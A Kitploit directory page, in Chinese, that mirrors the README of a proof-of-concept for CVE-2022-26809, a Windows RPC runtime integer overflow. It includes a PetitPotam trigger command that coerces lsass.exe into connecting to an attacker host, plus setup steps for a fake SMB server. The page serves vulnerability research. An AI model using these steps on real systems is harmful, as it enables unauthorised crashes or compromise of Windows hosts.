Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Cve-2022-26809 — CVE-2022-26809的概念验证漏洞利用程序,该漏洞是Windows RPC运行时中的整数溢出漏洞。包含使用PetitPotam风格的UNC路径强制攻击针对lsass.exe的触发脚本,以及用于漏洞利用测试的伪造SMB服务器。 | Kitploit
工具/GitHubGitHub/michealadams30/cve-2022-26809
漏洞分析漏洞利用渗透测试Payload 开发二进制利用
GitHubmichealadams30/cve-2022-26809

Cve-2022-26809

CVE-2022-26809的概念验证漏洞利用程序,该漏洞是Windows RPC运行时中的整数溢出漏洞。包含使用PetitPotam风格的UNC路径强制攻击针对lsass.exe的触发脚本,以及用于漏洞利用测试的伪造SMB服务器。

查看仓库
133年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Cve-2022-26809

CVE-2022-26809

本仓库仅简单研究该 CVE,更详细的分析请参考此处。
更新:2022年5月19日
该分析尚未完成……

更新:2022年5月22日
HuanGMz 的文章和 corelight 博客揭示了真正的漏洞点:

OSF_CASSOCIATION::ProcessBindAckOrNak

该漏洞的触发方式与 CVE-2021-43893 类似:当向 lsass.exe 发送带有 UNC 路径的 ESFRPC 请求时,受害者会尝试作为客户端访问目标,从而在客户端 API 处触发整数溢出。

如果你有更好的方法来触发此漏洞,欢迎提交 issue 或 pr :)

PoC-CVE-2022-26809

参考此处

由于该漏洞的触发方式与 CVE-2021-43893 类似,只需克隆 PetitPotam 的代码即可。

只需准备与下图所示相同的环境:

  • 触发端:使用 PetitPotam
  • 受害者:使用存在漏洞的 rpcrt4.dll
  • 攻击者:使用攻击者服务器
  1. 在攻击者服务器上运行 fake_smb_server.py,并用原始版本替换 rpcrt.py(**因为 Windows 上 445 端口已被 System 占用,建议在 Linux 上部署服务 **
  2. 通过以下命令触发受害者访问攻击者服务器:
python petitpotam.py -pipe lsarpc -method DecryptFileSrv -debug "user:[email protected]" "\\attacker.path\realfile
  1. 通常不会导致 BSOD,可为 lsass.exe 启用页面堆(不过我尚未成功触发 BSoD,但根据 windbg,整数溢出已被触发)

旧描述
以下是 Windows RPC 漏洞 CVE-2022-26809 的复现代码,参考自 https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/netds/rpc/hello。

PoC-OSF_SCALL::GetCoalescedBuffer

我的 Python 版本是 3.6.7
不确定 GetCoalescedBuffer 是否涉及真正的 CVE-2022-26809,先保留
poc.py 只是尝试触发漏洞函数 OSF_SCALL::GetCoalescedBuffer,不会导致任何崩溃,因为 dword 整数溢出很难复现。而 rpcrt.py 是 Python 包 impacket.dcerpc.v5.rpcrt,只需用原始版本替换它即可触发漏洞(请记得备份原始版本 :) 我相信 rpcrt.py 有很多 bug)。

如果不起作用,也许 wireshark 可以帮助定位 bug。

PipeDemo

如有必要,只需使用 nmake 重新构建即可。

下载工具